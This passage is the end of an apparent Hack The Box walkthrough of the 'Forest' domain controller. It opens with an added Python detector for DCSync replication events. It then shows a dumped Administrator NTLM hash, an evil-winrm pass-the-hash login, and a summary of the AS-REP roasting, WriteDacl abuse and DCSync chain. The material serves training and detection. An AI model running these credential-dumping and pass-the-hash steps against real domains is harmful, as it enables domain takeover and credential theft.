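Both steps above leave traces on the domain controller when directory service auditing is enabled: the ACL change on DC=htb,DC=local appears as event 5136 and the replication request as event 4662 carrying the replication extended-right GUIDs. The following is an added detection example, not part of the original write-up; the flattened event layout, the time field in seconds and all sample records are constructed assumptions.

```python
# Extended-right GUIDs of the two rights that "-Rights DCSync" grants.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
DOMAIN_DN = "DC=htb,DC=local"

# Constructed, simplified sample events (not from the original page).
EVENTS = [
    {"time": 100, "EventID": 5136, "SubjectUserName": "hack",
     "ObjectDN": "DC=htb,DC=local", "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"time": 160, "EventID": 4662, "SubjectUserName": "hack",
     "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"time": 161, "EventID": 4662, "SubjectUserName": "hack",
     "AccessMask": "0x100", "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"time": 170, "EventID": 4662, "SubjectUserName": "FOREST$",  # normal DC replication
     "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"time": 180, "EventID": 4662, "SubjectUserName": "svc-alfresco",
     "AccessMask": "0x10", "Properties": "{00000000-0000-0000-0000-000000000000}"},
]


def detect_dcsync(events, domain_controllers, window=3600):
    """Flag replication requests from accounts that are not domain controllers,
    and note whether the same account rewrote the domain object's security
    descriptor within `window` seconds beforehand."""
    dcs = {name.lower() for name in domain_controllers}
    dacl_changes = {}  # account -> time of its last DACL write on the domain root
    alerts = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        user = ev.get("SubjectUserName", "").lower()
        if ev["EventID"] == 5136:
            if (ev.get("ObjectDN", "").lower() == DOMAIN_DN.lower()
                    and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
                dacl_changes[user] = ev["time"]
        elif ev["EventID"] == 4662:
            props = ev.get("Properties", "").lower()
            rights = {g for g in (GET_CHANGES, GET_CHANGES_ALL) if g in props}
            control_access = int(ev.get("AccessMask", "0"), 16) & 0x100
            if not rights or not control_access or user in dcs:
                continue  # unrelated access, or a DC replicating as designed
            alert = alerts.setdefault(user, {
                "account": user, "rights": set(),
                "first_seen": ev["time"], "dacl_change_before": False})
            alert["rights"] |= rights
            changed = dacl_changes.get(user)
            if changed is not None and 0 <= ev["time"] - changed <= window:
                alert["dacl_change_before"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_dcsync(EVENTS, ["FOREST$"]):
        print(alert)
```

Accounts that replicate legitimately, such as directory synchronisation service accounts, belong in the same allow-list as the domain controllers.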

Getting the system flag

Dcsync:htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
type C:\Users\administrator\Desktop\root.txt

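Summary

Information gathering with nmap showed that the target machine is a domain controller. windapsearch showed that LDAP allows anonymous bind and user enumeration, which revealed that the htb.local service account svc-alfresco is open to an AS-REP Roasting attack.
GetNPUsers.py from the Impacket package was used to obtain the TGT hash, and hashcat or john cracked it to recover the plaintext password, which was used to log in to the domain controller over WinRM. SharpHound.ps1 collected the domain data and BloodHound was used to analyse the privilege path.
The analysis showed EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL WriteDacl DOMAIN ADMINS@HTB.LOCAL and that svc-alfresco is included in the EXCHANGE group, so the hack account was added to EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL.
WriteDacl was then abused for privilege escalation, and secretsdump.py from the impacket toolkit performed the DCSync to obtain domain admin privileges.
Tools used: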
nmap
windapsearch
Impacket
hashcat
john
evil-winrm
bloodhound
